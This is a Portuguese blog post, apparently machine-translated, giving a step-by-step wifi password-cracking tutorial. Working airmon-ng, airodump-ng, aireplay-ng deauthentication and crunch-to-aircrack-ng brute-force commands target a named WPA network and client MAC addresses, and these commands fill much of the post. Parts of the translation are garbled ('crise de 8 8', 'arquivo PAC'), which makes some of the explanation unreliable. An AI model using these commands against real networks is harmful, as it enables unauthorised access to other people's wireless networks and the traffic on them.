quarta-feira, 26 de fevereiro de 2014

Quebrando senhas wifi com crunch e aircrack-ng

Bem, este post é porque eu estou cansado desses arquivos de dicionário
que estão constantemente a aumentar em tamanho, até o ponto em que deixam de ser portátil,
então ao invés de comprar uma memória USB de maior capacidade. Eu decidi fazer algumas

pesquisas e acho que isso é uma ótima opção para usar como um último recurso,
pois este é um método de força bruta.
assim como o post diz. os programas para usar são a suíte e crunch Aircrack-ng

primeiro nós colocamos a nossa placa wireless em modo monitor: (aberto Root Shell janela)

airmon-ng start wlan0
airodump-ng mon0, (ou eth0, ou ...)
o cartão irá iniciar capturar as redes, esperar até o seu essid aparecer que tem que ser WPA ou WPA2 codificado
o meu é INFINITUMCBA277 seleione o seu
agora que você tem o endereço MAC eo ch(canal)
airodump-ng -c Canal --bssid 'omacandress' -w ESSID mon0
no caso :
airodump-ng -c 6 --bssid 58:98:35:CB:A2:77 -w INFINITUMCBA277 mon0
Entao agora iremos esperar por um tempo siga os proximo passo:
aireplay-ng -0 10 -a 'MACADDRESS' -c 'MACADDRESS' mon0
no caso:
aireplay-ng -0 10 -a 58:98:35:CB:A2:77 -c 70: D4:F2:91:AE:67 mon0
uma vez que o usuário é deauthenticated e reconecte vamos obter o aperto de mão
se o comando não funcionou, bem ... tente novamente (se depois de u fez o comando Deauthenticate notando parece aconteceu ...
talvez você está muito longe de ser o cliente porque este comando vai diretamente para a conexão do cliente.):
( você vai ver algo como: aperto WPA 58:98:35: CB: A2: 77
então agora nós usamos cruch
vamos usar o arquivo * cap. foram que foi salva
geralmente em Xiaopan OS está em / home / tc /
de modo que o é:
crunch 8 8 0123456789 | aircrack-ng -a 2 'HOME-TC-FILE-CAP' -e 'ESSID' -b 'HANDSHAKE' -w -
ele deve ser parecido com isto:
crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w -
Então você só tem que esperar para crunch e aircrack-ng para verificar cada combinação.
Destaco o último comando, porque eu quero explicar isso para que você possa adaptar o programa às suas necessidades:
crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w -
Então, vamos começar com a primeira instrução: crunch é o gerador de lista de palavras : crunch 8 8
crunch de 8 8
Em segundo lugar : a '8 8 ' é para o comprimento da palavra em caracteres , o primeiro '8' indica que o comprimento de
partida e o segundo '8 ' o comprimento final . Então, se você quiser testar a sua segurança com 16 caracteres senha que você
pode mudar para '16 16 'ou '8 16. '
crise de 8 8 0123456789
Terceiro: '0123456789 ' esta é a lista de caracteres a serem incluídos na lista de palavras para uma senha numérica .
Atenção: 75% dos usuários usam senhas numéricas . mas você também pode tentar algo como: '01234567890abcdefghijklf '
, usando uma lista de palavras alfanumérico o tempo vai aumentar à medida que este é um método de força bruta .
0123456789 | aircrack -ng

Em quarto lugar : este símbolo é muito importante -> | < - como indica o final de instruções para a crise e as novas
instruções para aircrack -ng .
Por último, mas não menos importante: o lugar fosse o arquivo PAC é tem que ser preciso : . Idéia
Bem, há um monte de programa que fazem coisas como esta , eu só gosto mais de fazê-lo por mim mesmo: D. Bem é isso, deixe-me
saber se você encontrar este post útil.
esse tesxt foi um quase traduçao do seguinte texto: http://xiaopan.co/forums/threads/crunch-aircrack-ng-to-avoid-wordlists.809/
se voce quiser se aprofundar tem esse link que e um curso de test em wireles: link do mega

0 comentários:

Postar um comentário